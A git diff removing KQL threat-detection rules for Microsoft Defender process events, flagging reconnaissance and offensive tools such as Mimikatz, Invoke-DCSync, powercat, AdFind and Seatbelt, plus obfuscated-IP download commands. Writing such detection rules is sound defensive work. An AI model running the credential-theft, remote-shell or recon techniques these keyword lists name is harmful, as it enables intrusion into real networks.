ProcessCommandLine contains "HTTP-Login" or ProcessCommandLine contains "Install-ServiceBinary" or ProcessCommandLine contains "Install-SSP" or ProcessCommandLine contains "Invoke-ACLScanner" or ProcessCommandLine contains "Invoke-ADRecon" or ProcessCommandLine contains "Invoke-ADSBackdoor" or ProcessCommandLine contains "Invoke-AgentSmith" or ProcessCommandLine contains "Invoke-AllChecks" or ProcessCommandLine contains "Invoke-ARPScan" or ProcessCommandLine contains "Invoke-AzureHound" or ProcessCommandLine contains "Invoke-BackdoorLNK" or ProcessCommandLine contains "Invoke-BadPotato" or ProcessCommandLine contains "Invoke-BetterSafetyKatz" or ProcessCommandLine contains "Invoke-BypassUAC" or ProcessCommandLine contains "Invoke-Carbuncle" or ProcessCommandLine contains "Invoke-Certify" or ProcessCommandLine contains "Invoke-ConPtyShell" or ProcessCommandLine contains "Invoke-CredentialInjection" or ProcessCommandLine contains "Invoke-DAFT" or ProcessCommandLine contains "Invoke-DCSync" or ProcessCommandLine contains "Invoke-DinvokeKatz" or ProcessCommandLine contains "Invoke-DllInjection" or ProcessCommandLine contains "Invoke-DNSUpdate" or ProcessCommandLine contains "Invoke-DomainPasswordSpray" or ProcessCommandLine contains "Invoke-DowngradeAccount" or ProcessCommandLine contains "Invoke-EgressCheck" or ProcessCommandLine contains "Invoke-Eyewitness" or ProcessCommandLine contains "Invoke-FakeLogonScreen" or ProcessCommandLine contains "Invoke-Farmer" or ProcessCommandLine contains "Invoke-Get-RBCD-Threaded" or ProcessCommandLine contains "Invoke-Gopher" or ProcessCommandLine contains "Invoke-Grouper" or ProcessCommandLine contains "Invoke-HandleKatz" or ProcessCommandLine contains "Invoke-ImpersonatedProcess" or ProcessCommandLine contains "Invoke-ImpersonateSystem" or ProcessCommandLine contains "Invoke-InteractiveSystemPowerShell" or ProcessCommandLine contains "Invoke-Internalmonologue" or ProcessCommandLine contains "Invoke-Inveigh" or ProcessCommandLine contains "Invoke-InveighRelay" or ProcessCommandLine contains "Invoke-KrbRelay" or ProcessCommandLine contains "Invoke-LdapSignCheck" or ProcessCommandLine contains "Invoke-Lockless" or ProcessCommandLine contains "Invoke-MalSCCM" or ProcessCommandLine contains "Invoke-Mimikatz" or ProcessCommandLine contains "Invoke-Mimikittenz" or ProcessCommandLine contains "Invoke-MITM6" or ProcessCommandLine contains "Invoke-NanoDump" or ProcessCommandLine contains "Invoke-NetRipper" or ProcessCommandLine contains "Invoke-Nightmare" or ProcessCommandLine contains "Invoke-NinjaCopy" or ProcessCommandLine contains "Invoke-OfficeScrape" or ProcessCommandLine contains "Invoke-OxidResolver" or ProcessCommandLine contains "Invoke-P0wnedshell" or ProcessCommandLine contains "Invoke-Paranoia" or ProcessCommandLine contains "Invoke-PortScan" or ProcessCommandLine contains "Invoke-PoshRatHttp" or ProcessCommandLine contains "Invoke-PostExfil" or ProcessCommandLine contains "Invoke-PowerDump" or ProcessCommandLine contains "Invoke-PowerShellTCP" or ProcessCommandLine contains "Invoke-PowerShellWMI" or ProcessCommandLine contains "Invoke-PPLDump" or ProcessCommandLine contains "Invoke-PsExec" or ProcessCommandLine contains "Invoke-PSInject" or ProcessCommandLine contains "Invoke-PsUaCme" or ProcessCommandLine contains "Invoke-ReflectivePEInjection" or ProcessCommandLine contains "Invoke-ReverseDNSLookup" or ProcessCommandLine contains "Invoke-Rubeus" or ProcessCommandLine contains "Invoke-RunAs" or ProcessCommandLine contains "Invoke-SafetyKatz" or ProcessCommandLine contains "Invoke-SauronEye" or ProcessCommandLine contains "Invoke-SCShell" or ProcessCommandLine contains "Invoke-Seatbelt" or ProcessCommandLine contains "Invoke-ServiceAbuse" or ProcessCommandLine contains "Invoke-ShadowSpray" or ProcessCommandLine contains "Invoke-Sharp" or ProcessCommandLine contains "Invoke-Shellcode" or ProcessCommandLine contains "Invoke-SMBScanner" or ProcessCommandLine contains "Invoke-Snaffler" or ProcessCommandLine contains "Invoke-Spoolsample" or ProcessCommandLine contains "Invoke-SpraySinglePassword" or ProcessCommandLine contains "Invoke-SSHCommand" or ProcessCommandLine contains "Invoke-StandIn" or ProcessCommandLine contains "Invoke-StickyNotesExtract" or ProcessCommandLine contains "Invoke-SystemCommand" or ProcessCommandLine contains "Invoke-Tasksbackdoor" or ProcessCommandLine contains "Invoke-Tater" or ProcessCommandLine contains "Invoke-Thunderfox" or ProcessCommandLine contains "Invoke-ThunderStruck" or ProcessCommandLine contains "Invoke-TokenManipulation" or ProcessCommandLine contains "Invoke-Tokenvator" or ProcessCommandLine contains "Invoke-TotalExec" or ProcessCommandLine contains "Invoke-UrbanBishop" or ProcessCommandLine contains "Invoke-UserHunter" or ProcessCommandLine contains "Invoke-VoiceTroll" or ProcessCommandLine contains "Invoke-Whisker" or ProcessCommandLine contains "Invoke-WinEnum" or ProcessCommandLine contains "Invoke-winPEAS" or ProcessCommandLine contains "Invoke-WireTap" or ProcessCommandLine contains "Invoke-WmiCommand" or ProcessCommandLine contains "Invoke-WMIExec" or ProcessCommandLine contains "Invoke-WScriptBypassUAC" or ProcessCommandLine contains "Invoke-Zerologon" or ProcessCommandLine contains "MailRaider" or ProcessCommandLine contains "New-ADIDNSNode" or ProcessCommandLine contains "New-DNSRecordArray" or ProcessCommandLine contains "New-HoneyHash" or ProcessCommandLine contains "New-InMemoryModule" or ProcessCommandLine contains "New-MachineAccount" or ProcessCommandLine contains "New-SOASerialNumberArray" or ProcessCommandLine contains "Out-Minidump" or ProcessCommandLine contains "Port-Scan" or ProcessCommandLine contains "PowerBreach" or ProcessCommandLine contains "powercat " or ProcessCommandLine contains "PowerUp" or ProcessCommandLine contains "PowerView" or ProcessCommandLine contains "Remove-ADIDNSNode" or ProcessCommandLine contains "Remove-MachineAccount" or ProcessCommandLine contains "Remove-Update" or ProcessCommandLine contains "Rename-ADIDNSNode" or ProcessCommandLine contains "Revoke-ADIDNSPermission" or ProcessCommandLine contains "Set-ADIDNSNode" or ProcessCommandLine contains "Set-MacAttribute" or ProcessCommandLine contains "Set-MachineAccountAttribute" or ProcessCommandLine contains "Set-Wallpaper" or ProcessCommandLine contains "Show-TargetScreen" or ProcessCommandLine contains "Start-CaptureServer" or ProcessCommandLine contains "Start-Dnscat2" or ProcessCommandLine contains "Start-WebcamRecorder" or ProcessCommandLine contains "VolumeShadowCopyTools" \ No newline at end of file diff --git a/Discovery/Network_Reconnaissance_Activity.kql b/Discovery/Network_Reconnaissance_Activity.kql deleted file mode 100644 index 511409c8..00000000 --- a/Discovery/Network_Reconnaissance_Activity.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/02/07 -// Level: high -// Description: Detects a set of suspicious network related commands often used in recon stages -// Tags: attack.discovery, attack.t1087, attack.t1082, car.2016-03-001 -DeviceProcessEvents -| where ProcessCommandLine contains "nslookup" and ProcessCommandLine contains "_ldap._tcp.dc._msdcs." \ No newline at end of file diff --git a/Discovery/New_Network_Trace_Capture_Started_Via_Netsh.EXE.kql b/Discovery/New_Network_Trace_Capture_Started_Via_Netsh.EXE.kql deleted file mode 100644 index fb03775e..00000000 --- a/Discovery/New_Network_Trace_Capture_Started_Via_Netsh.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Kutepov Anton, oscd.community -// Date: 2019/10/24 -// Level: medium -// Description: Detects the execution of netsh with the "trace" flag in order to start a network capture -// Tags: attack.discovery, attack.credential_access, attack.t1040 -DeviceProcessEvents -| where (ProcessCommandLine contains "trace" and ProcessCommandLine contains "start") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") \ No newline at end of file diff --git a/Discovery/Nltest.EXE_Execution.kql b/Discovery/Nltest.EXE_Execution.kql deleted file mode 100644 index fbb98d57..00000000 --- a/Discovery/Nltest.EXE_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Arun Chauhan -// Date: 2023/02/03 -// Level: low -// Description: Detects nltest commands that can be used for information discovery -// Tags: attack.discovery, attack.t1016, attack.t1018, attack.t1482 -DeviceProcessEvents -| where FolderPath endswith "\\nltest.exe" or ProcessVersionInfoOriginalFileName =~ "nltestrk.exe" \ No newline at end of file diff --git a/Discovery/Obfuscated_IP_Download_Activity.kql b/Discovery/Obfuscated_IP_Download_Activity.kql deleted file mode 100644 index 20e6fdaa..00000000 --- a/Discovery/Obfuscated_IP_Download_Activity.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) -// Date: 2022/08/03 -// Level: medium -// Description: Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command -// Tags: attack.discovery -DeviceProcessEvents -| where (ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "wget " or ProcessCommandLine contains "curl " or ProcessCommandLine contains "DownloadFile" or ProcessCommandLine contains "DownloadString") and ((ProcessCommandLine contains " 0x" or ProcessCommandLine contains "//0x" or ProcessCommandLine contains ".0x" or ProcessCommandLine contains ".00x") or (ProcessCommandLine contains "http://%" and ProcessCommandLine contains "%2e") or (ProcessCommandLine matches regex "https?://[0-9]{1,3}\\.[0-9]{1,3}\\.0[0-9]{3,4}" or ProcessCommandLine matches regex "https?://[0-9]{1,3}\\.0[0-9]{3,7}" or ProcessCommandLine matches regex "https?://0[0-9]{3,11}" or ProcessCommandLine matches regex "https?://(0[0-9]{1,11}\\.){3}0[0-9]{1,11}" or ProcessCommandLine matches regex "https?://0[0-9]{1,11}" or ProcessCommandLine matches regex " [0-7]{7,13}")) and (not(ProcessCommandLine matches regex "https?://((25[0-5]|(2[0-4]|1\\d|[1-9])?\\d)(\\.|\\b)){4}")) \ No newline at end of file diff --git a/Discovery/Obfuscated_IP_Via_CLI.kql b/Discovery/Obfuscated_IP_Via_CLI.kql deleted file mode 100644 index 43d59e08..00000000 --- a/Discovery/Obfuscated_IP_Via_CLI.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) -// Date: 2022/08/03 -// Level: medium -// Description: Detects usage of an encoded/obfuscated version of an IP address (hex, octal, etc.) via command line -// Tags: attack.discovery -DeviceProcessEvents -| where (FolderPath endswith "\\ping.exe" or FolderPath endswith "\\arp.exe") and ((ProcessCommandLine contains " 0x" or ProcessCommandLine contains "//0x" or ProcessCommandLine contains ".0x" or ProcessCommandLine contains ".00x") or (ProcessCommandLine contains "http://%" and ProcessCommandLine contains "%2e") or (ProcessCommandLine matches regex "https?://[0-9]{1,3}\\.[0-9]{1,3}\\.0[0-9]{3,4}" or ProcessCommandLine matches regex "https?://[0-9]{1,3}\\.0[0-9]{3,7}" or ProcessCommandLine matches regex "https?://0[0-9]{3,11}" or ProcessCommandLine matches regex "https?://(0[0-9]{1,11}\\.){3}0[0-9]{1,11}" or ProcessCommandLine matches regex "https?://0[0-9]{1,11}" or ProcessCommandLine matches regex " [0-7]{7,13}")) and (not(ProcessCommandLine matches regex "https?://((25[0-5]|(2[0-4]|1\\d|[1-9])?\\d)(\\.|\\b)){4}")) \ No newline at end of file diff --git a/Discovery/PUA_-_AdFind_Suspicious_Execution.kql b/Discovery/PUA_-_AdFind_Suspicious_Execution.kql deleted file mode 100644 index 665b314e..00000000 --- a/Discovery/PUA_-_AdFind_Suspicious_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community -// Date: 2021/02/02 -// Level: high -// Description: Detects AdFind execution with common flags seen used during attacks -// Tags: attack.discovery, attack.t1018, attack.t1087.002, attack.t1482, attack.t1069.002, stp.1u -DeviceProcessEvents -| where ProcessCommandLine contains "domainlist" or ProcessCommandLine contains "trustdmp" or ProcessCommandLine contains "dcmodes" or ProcessCommandLine contains "adinfo" or ProcessCommandLine contains " dclist " or ProcessCommandLine contains "computer_pwdnotreqd" or ProcessCommandLine contains "objectcategory=" or ProcessCommandLine contains "-subnets -f" or ProcessCommandLine contains "name=\"Domain Admins\"" or ProcessCommandLine contains "-sc u:" or ProcessCommandLine contains "domainncs" or ProcessCommandLine contains "dompol" or ProcessCommandLine contains " oudmp " or ProcessCommandLine contains "subnetdmp" or ProcessCommandLine contains "gpodmp" or ProcessCommandLine contains "fspdmp" or ProcessCommandLine contains "users_noexpire" or ProcessCommandLine contains "computers_active" or ProcessCommandLine contains "computers_pwdnotreqd" \ No newline at end of file diff --git a/Discovery/PUA_-_Adidnsdump_Execution.kql b/Discovery/PUA_-_Adidnsdump_Execution.kql deleted file mode 100644 index 18f6a3fc..00000000 --- a/Discovery/PUA_-_Adidnsdump_Execution.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: frack113 -// Date: 2022/01/01 -// Level: low -// Description: This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed, -Usee to Query/modify DNS records for Active Directory integrated DNS via LDAP - -// Tags: attack.discovery, attack.t1018 -DeviceProcessEvents -| where ProcessCommandLine contains "adidnsdump" and FolderPath endswith "\\python.exe" \ No newline at end of file diff --git a/Discovery/PUA_-_Advanced_IP_Scanner_Execution.kql b/Discovery/PUA_-_Advanced_IP_Scanner_Execution.kql deleted file mode 100644 index 0d88a8e3..00000000 --- a/Discovery/PUA_-_Advanced_IP_Scanner_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), @ROxPinTeddy -// Date: 2020/05/12 -// Level: medium -// Description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups. -// Tags: attack.discovery, attack.t1046, attack.t1135 -DeviceProcessEvents -| where (ProcessCommandLine contains "/portable" and ProcessCommandLine contains "/lng") or (FolderPath contains "\\advanced_ip_scanner" or ProcessVersionInfoOriginalFileName contains "advanced_ip_scanner" or ProcessVersionInfoFileDescription contains "Advanced IP Scanner") \ No newline at end of file diff --git a/Discovery/PUA_-_Advanced_Port_Scanner_Execution.kql b/Discovery/PUA_-_Advanced_Port_Scanner_Execution.kql deleted file mode 100644 index 7d57516a..00000000 --- a/Discovery/PUA_-_Advanced_Port_Scanner_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2021/12/18 -// Level: medium -// Description: Detects the use of Advanced Port Scanner. -// Tags: attack.discovery, attack.t1046, attack.t1135 -DeviceProcessEvents -| where (ProcessCommandLine contains "/portable" and ProcessCommandLine contains "/lng") or (FolderPath contains "\\advanced_port_scanner" or ProcessVersionInfoOriginalFileName contains "advanced_port_scanner" or ProcessVersionInfoFileDescription contains "Advanced Port Scanner") \ No newline at end of file diff --git a/Discovery/PUA_-_Crassus_Execution.kql b/Discovery/PUA_-_Crassus_Execution.kql deleted file mode 100644 index a6d0a8b2..00000000 --- a/Discovery/PUA_-_Crassus_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: pH-T (Nextron Systems) -// Date: 2023/04/17 -// Level: high -// Description: Detects Crassus, a Windows privilege escalation discovery tool, based on PE metadata characteristics. -// Tags: attack.discovery, attack.t1590.001 -DeviceProcessEvents -| where FolderPath endswith "\\Crassus.exe" or ProcessVersionInfoOriginalFileName =~ "Crassus.exe" or ProcessVersionInfoFileDescription contains "Crassus" \ No newline at end of file diff --git a/Discovery/PUA_-_Seatbelt_Execution.kql b/Discovery/PUA_-_Seatbelt_Execution.kql deleted file mode 100644 index 4a282d83..00000000 --- a/Discovery/PUA_-_Seatbelt_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/10/18 -// Level: high -// Description: Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters -// Tags: attack.discovery, attack.t1526, attack.t1087, attack.t1083 -DeviceProcessEvents -| where (FolderPath endswith "\\Seatbelt.exe" or ProcessVersionInfoOriginalFileName =~ "Seatbelt.exe" or ProcessVersionInfoFileDescription =~ "Seatbelt" or (ProcessCommandLine contains " DpapiMasterKeys" or ProcessCommandLine contains " InterestingProcesses" or ProcessCommandLine contains " InterestingFiles" or ProcessCommandLine contains " CertificateThumbprints" or ProcessCommandLine contains " ChromiumBookmarks" or ProcessCommandLine contains " ChromiumHistory" or ProcessCommandLine contains " ChromiumPresence" or ProcessCommandLine contains " CloudCredentials" or ProcessCommandLine contains " CredEnum" or ProcessCommandLine contains " CredGuard" or ProcessCommandLine contains " FirefoxHistory" or ProcessCommandLine contains " ProcessCreationEvents")) or ((ProcessCommandLine contains " -group=misc" or ProcessCommandLine contains " -group=remote" or ProcessCommandLine contains " -group=chromium" or ProcessCommandLine contains " -group=slack" or ProcessCommandLine contains " -group=system" or ProcessCommandLine contains " -group=user" or ProcessCommandLine contains " -group=all") and ProcessCommandLine contains " -outputfile=") \ No newline at end of file diff --git a/Discovery/PUA_-_SoftPerfect_Netscan_Execution.kql b/Discovery/PUA_-_SoftPerfect_Netscan_Execution.kql deleted file mode 100644 index 66385a3e..00000000 --- a/Discovery/PUA_-_SoftPerfect_Netscan_Execution.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: @d4ns4n_ (Wuerth-Phoenix) -// Date: 2024/04/25 -// Level: medium -// Description: Detects usage of SoftPerfect's "netscan.exe". An application for scanning networks. -It is actively used in-the-wild by threat actors to inspect and understand the network architecture of a victim. - -// Tags: attack.discovery, attack.t1046 -DeviceProcessEvents -| where FolderPath endswith "\\netscan.exe" or ProcessVersionInfoProductName =~ "Network Scanner" or ProcessVersionInfoFileDescription =~ "Application for scanning networks" \ No newline at end of file diff --git a/Discovery/PUA_-_Suspicious_ActiveDirectory_Enumeration_Via_AdFind.EXE.kql b/Discovery/PUA_-_Suspicious_ActiveDirectory_Enumeration_Via_AdFind.EXE.kql deleted file mode 100644 index 14d15c3a..00000000 --- a/Discovery/PUA_-_Suspicious_ActiveDirectory_Enumeration_Via_AdFind.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/12/13 -// Level: high -// Description: Detects active directory enumeration activity using known AdFind CLI flags -// Tags: attack.discovery, attack.t1087.002 -DeviceProcessEvents -| where ProcessCommandLine contains "-sc admincountdmp" or ProcessCommandLine contains "-sc exchaddresses" or (ProcessCommandLine contains "lockoutduration" or ProcessCommandLine contains "lockoutthreshold" or ProcessCommandLine contains "lockoutobservationwindow" or ProcessCommandLine contains "maxpwdage" or ProcessCommandLine contains "minpwdage" or ProcessCommandLine contains "minpwdlength" or ProcessCommandLine contains "pwdhistorylength" or ProcessCommandLine contains "pwdproperties") \ No newline at end of file diff --git a/Discovery/Permission_Check_Via_Accesschk.EXE.kql b/Discovery/Permission_Check_Via_Accesschk.EXE.kql deleted file mode 100644 index 7b93caa8..00000000 --- a/Discovery/Permission_Check_Via_Accesschk.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Teymur Kheirkhabarov (idea), Mangatas Tondang, oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2020/10/13 -// Level: medium -// Description: Detects the usage of the "Accesschk" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges -// Tags: attack.discovery, attack.t1069.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "uwcqv " or ProcessCommandLine contains "kwsu " or ProcessCommandLine contains "qwsu " or ProcessCommandLine contains "uwdqs ") and (ProcessVersionInfoProductName endswith "AccessChk" or ProcessVersionInfoFileDescription contains "Reports effective permissions" or (FolderPath endswith "\\accesschk.exe" or FolderPath endswith "\\accesschk64.exe") or ProcessVersionInfoOriginalFileName =~ "accesschk.exe") \ No newline at end of file diff --git a/Discovery/Potential_Active_Directory_Enumeration_Using_AD_Module_-_ProcCreation.kql b/Discovery/Potential_Active_Directory_Enumeration_Using_AD_Module_-_ProcCreation.kql deleted file mode 100644 index 3f12168b..00000000 --- a/Discovery/Potential_Active_Directory_Enumeration_Using_AD_Module_-_ProcCreation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2023/01/22 -// Level: medium -// Description: Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration. -// Tags: attack.reconnaissance, attack.discovery, attack.impact -DeviceProcessEvents -| where (ProcessCommandLine contains "Import-Module " or ProcessCommandLine contains "ipmo ") and ProcessCommandLine contains "Microsoft.ActiveDirectory.Management.dll" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/Discovery/Potential_Configuration_And_Service_Reconnaissance_Via_Reg.EXE.kql b/Discovery/Potential_Configuration_And_Service_Reconnaissance_Via_Reg.EXE.kql deleted file mode 100644 index d61c3ee0..00000000 --- a/Discovery/Potential_Configuration_And_Service_Reconnaissance_Via_Reg.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Timur Zinniatullin, oscd.community -// Date: 2019/10/21 -// Level: medium -// Description: Detects the usage of "reg.exe" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software. -// Tags: attack.discovery, attack.t1012, attack.t1007 -DeviceProcessEvents -| where ProcessCommandLine contains "query" and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "currentVersion\\windows" or ProcessCommandLine contains "winlogon\\" or ProcessCommandLine contains "currentVersion\\shellServiceObjectDelayLoad" or ProcessCommandLine contains "currentVersion\\run" or ProcessCommandLine contains "currentVersion\\policies\\explorer\\run" or ProcessCommandLine contains "currentcontrolset\\services") \ No newline at end of file diff --git a/Discovery/Potential_Discovery_Activity_Via_Dnscmd.EXE.kql b/Discovery/Potential_Discovery_Activity_Via_Dnscmd.EXE.kql deleted file mode 100644 index 0f2eb648..00000000 --- a/Discovery/Potential_Discovery_Activity_Via_Dnscmd.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: @gott_cyber -// Date: 2022/07/31 -// Level: medium -// Description: Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain. -// Tags: attack.discovery, attack.execution, attack.t1543.003 -DeviceProcessEvents -| where (ProcessCommandLine contains "/enumrecords" or ProcessCommandLine contains "/enumzones" or ProcessCommandLine contains "/ZonePrint" or ProcessCommandLine contains "/info") and FolderPath endswith "\\dnscmd.exe" \ No newline at end of file diff --git a/Discovery/Potential_Network_Sniffing_Activity_Using_Network_Tools.kql b/Discovery/Potential_Network_Sniffing_Activity_Using_Network_Tools.kql deleted file mode 100644 index a9505cd1..00000000 --- a/Discovery/Potential_Network_Sniffing_Activity_Using_Network_Tools.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2019/10/21 -// Level: medium -// Description: Detects potential network sniffing via use of network tools such as "tshark", "windump". -Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. -An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. - -// Tags: attack.credential_access, attack.discovery, attack.t1040 -DeviceProcessEvents -| where (ProcessCommandLine contains "-i" and FolderPath endswith "\\tshark.exe") or FolderPath endswith "\\windump.exe" \ No newline at end of file diff --git a/Discovery/Potential_Recon_Activity_Using_DriverQuery.EXE.kql b/Discovery/Potential_Recon_Activity_Using_DriverQuery.EXE.kql deleted file mode 100644 index 830e114d..00000000 --- a/Discovery/Potential_Recon_Activity_Using_DriverQuery.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/19 -// Level: high -// Description: Detect usage of the "driverquery" utility to perform reconnaissance on installed drivers -// Tags: attack.discovery -DeviceProcessEvents -| where (FolderPath endswith "driverquery.exe" or ProcessVersionInfoOriginalFileName =~ "drvqry.exe") and ((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\" or InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Windows\\Temp\\")) \ No newline at end of file diff --git a/Discovery/Potential_Recon_Activity_Via_Nltest.EXE.kql b/Discovery/Potential_Recon_Activity_Via_Nltest.EXE.kql deleted file mode 100644 index 97fbb117..00000000 --- a/Discovery/Potential_Recon_Activity_Via_Nltest.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Craig Young, oscd.community, Georg Lauenstein -// Date: 2021/07/24 -// Level: medium -// Description: Detects nltest commands that can be used for information discovery -// Tags: attack.discovery, attack.t1016, attack.t1482 -DeviceProcessEvents -| where (FolderPath endswith "\\nltest.exe" or ProcessVersionInfoOriginalFileName =~ "nltestrk.exe") and ((ProcessCommandLine contains "server" and ProcessCommandLine contains "query") or (ProcessCommandLine contains "/user" or ProcessCommandLine contains "all_trusts" or ProcessCommandLine contains "dclist:" or ProcessCommandLine contains "dnsgetdc:" or ProcessCommandLine contains "domain_trusts" or ProcessCommandLine contains "dsgetdc:" or ProcessCommandLine contains "parentdomain" or ProcessCommandLine contains "trusted_domains")) \ No newline at end of file diff --git a/Discovery/Potential_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql b/Discovery/Potential_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql deleted file mode 100644 index 439202c1..00000000 --- a/Discovery/Potential_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: blueteamer8699 -// Date: 2022/01/03 -// Level: medium -// Description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine -// Tags: attack.discovery, attack.execution, attack.t1615, attack.t1059.005 -DeviceProcessEvents -| where ProcessCommandLine contains "gatherNetworkInfo.vbs" and ((FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("cscript.exe", "wscript.exe"))) \ No newline at end of file diff --git a/Discovery/Potential_Suspicious_Activity_Using_SeCEdit.kql b/Discovery/Potential_Suspicious_Activity_Using_SeCEdit.kql deleted file mode 100644 index e8d18e0e..00000000 --- a/Discovery/Potential_Suspicious_Activity_Using_SeCEdit.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Janantha Marasinghe -// Date: 2022/11/18 -// Level: medium -// Description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy -// Tags: attack.discovery, attack.persistence, attack.defense_evasion, attack.credential_access, attack.privilege_escalation, attack.t1562.002, attack.t1547.001, attack.t1505.005, attack.t1556.002, attack.t1562, attack.t1574.007, attack.t1564.002, attack.t1546.008, attack.t1546.007, attack.t1547.014, attack.t1547.010, attack.t1547.002, attack.t1557, attack.t1082 -DeviceProcessEvents -| where (FolderPath endswith "\\secedit.exe" or ProcessVersionInfoOriginalFileName =~ "SeCEdit") and ((ProcessCommandLine contains "/configure" and ProcessCommandLine contains "/db") or (ProcessCommandLine contains "/export" and ProcessCommandLine contains "/cfg")) \ No newline at end of file diff --git a/Discovery/Potentially_Suspicious_EventLog_Recon_Activity_Using_Log_Query_Utilities.kql b/Discovery/Potentially_Suspicious_EventLog_Recon_Activity_Using_Log_Query_Utilities.kql deleted file mode 100644 index 5a9213f4..00000000 --- a/Discovery/Potentially_Suspicious_EventLog_Recon_Activity_Using_Log_Query_Utilities.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) -// Date: 2022/09/09 -// Level: medium -// Description: Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs. -This technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc. - -// Tags: attack.credential_access, attack.discovery, attack.t1552 -DeviceProcessEvents -| where ((ProcessCommandLine contains "-InstanceId 4624" or ProcessCommandLine contains "System[EventID=4624]" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "4624") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "4624") or ProcessCommandLine contains "-InstanceId 4778" or ProcessCommandLine contains "System[EventID=4778]" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "4778") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "4778") or ProcessCommandLine contains "-InstanceId 25" or ProcessCommandLine contains "System[EventID=25]" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "25") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "25")) or (ProcessCommandLine contains "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" or ProcessCommandLine contains "Microsoft-Windows-Terminal-Services-RemoteConnectionManager/Operational" or ProcessCommandLine contains "Security")) and ((ProcessCommandLine contains "Select" and ProcessCommandLine contains "Win32_NTLogEvent") or ((ProcessCommandLine contains " qe " or ProcessCommandLine contains " query-events ") and (FolderPath endswith "\\wevtutil.exe" or ProcessVersionInfoOriginalFileName =~ "wevtutil.exe")) or (ProcessCommandLine contains " ntevent" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) or (ProcessCommandLine contains "Get-WinEvent " or ProcessCommandLine contains "get-eventlog ")) \ No newline at end of file diff --git a/Discovery/Python_Initiated_Connection.kql 